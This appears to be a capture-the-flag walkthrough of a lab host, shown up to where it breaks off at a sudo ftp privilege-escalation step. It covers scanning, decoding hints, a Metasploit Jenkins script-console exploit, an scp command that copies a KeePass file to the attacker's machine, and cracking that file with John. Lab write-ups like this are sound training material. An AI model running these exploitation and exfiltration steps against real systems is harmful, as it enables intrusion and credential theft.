We start by scanning the host with nmap -A -T4 -p- 192.168.1.20 -vv
Dirb scan results:
Alongside this pwd.txt file there is a reality.cap that we downloaded; it looks like a deauthentication capture from a Wi-Fi router. Cracking it with Aircrack-ng gave me nothing:
Downloading the space image file and viewing it with exiftool, we can see a comment inside the photo:
It says space stone and some hash; cracking the hash online came back with the name yashika.
The page aether.php is a quiz page; solving it as binary gave us the code 01101001 as the path to the hint file:
Wow, I came to this weird-looking code; running it through Google showed it to be the BrainFuck language, and after decoding it I got the login name and password admin:avengers
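To show how a hint like that is actually evaluated, here is an added minimal Brainfuck interpreter (example code, not part of the original write-up); the sample program below is constructed for the example and is not the code from the box.

```python
# Minimal Brainfuck interpreter: the "weird looking code" in the write-up is a
# Brainfuck program, and this is how such a program is run to recover its output.

# Constructed sample program (not the one from the box): prints "Hi".
SAMPLE_PROGRAM = "++++++++[>+++++++++<-]>." + "+" * 33 + "."


def match_brackets(code: str) -> dict:
    """Pre-compute the jump table for [ and ] so each jump costs O(1)."""
    stack, jumps = [], {}
    for pos, ch in enumerate(code):
        if ch == "[":
            stack.append(pos)
        elif ch == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at offset {pos}")
            start = stack.pop()
            jumps[start], jumps[pos] = pos, start
    if stack:
        raise ValueError(f"unmatched '[' at offset {stack[-1]}")
    return jumps


def run_brainfuck(code: str, stdin: bytes = b"", max_steps: int = 1_000_000) -> str:
    """Run code and return everything it writes to stdout as text.
    Cells are 8-bit and wrap; max_steps keeps a buggy or hostile hint file
    from spinning forever when you decode it blindly."""
    jumps = match_brackets(code)
    tape = bytearray(30000)
    ptr = pc = inp = steps = 0
    out = bytearray()
    while pc < len(code):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit exceeded")
        ch = code[pc]
        if ch == ">":
            ptr += 1
        elif ch == "<":
            ptr -= 1
            if ptr < 0:
                raise IndexError("tape pointer moved below cell 0")
        elif ch == "+":
            tape[ptr] = (tape[ptr] + 1) % 256
        elif ch == "-":
            tape[ptr] = (tape[ptr] - 1) % 256
        elif ch == ".":
            out.append(tape[ptr])
        elif ch == ",":  # read one byte of input, 0 at end of input
            tape[ptr] = stdin[inp] if inp < len(stdin) else 0
            inp += 1
        elif ch == "[" and tape[ptr] == 0:
            pc = jumps[pc]
        elif ch == "]" and tape[ptr] != 0:
            pc = jumps[pc]
        pc += 1  # non-command characters are comments and are skipped
    return out.decode("latin-1")


if __name__ == "__main__":
    print(run_brainfuck(SAMPLE_PROGRAM))
```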
Now let's head to http://192.168.1.20:8080 to log in there.
And we got in:
Now if you search for Jenkins on searchsploit you will find an exploit through Metasploit that we can use to gain a shell on the host: use exploit/multi/http/jenkins_script_console
Using the LinEnum.sh script gave me a file named script in /opt and another file, morag.kdbx, which I copied to /html so I could download it to my machine. The file script we had already found before, BUT it was inside the image, where we decoded it and found yashika.
While copying the file to /var/www/html I found a folder named gamA00fe2012, which would be the password to the reality.cap file we found earlier.
And just to be sure I ran it again through Aircrack-ng, and yes, it's the password for the reality.cap file.
Now back to the morag.kdbx file: I copied it to my machine using scp -P 22 morag.kdbx email@example.com:/root/ and looked up .kdbx files, so what I did was convert this file to a hash so I could crack the hash in John.
Now that we have the password, we can open the file with the password princesa by going to the website https://app.keeweb.info/
I was able to open the file and found a base64 string that we can decode (morag:yondu).
So what I did was just write sudo /usr/bin/ftp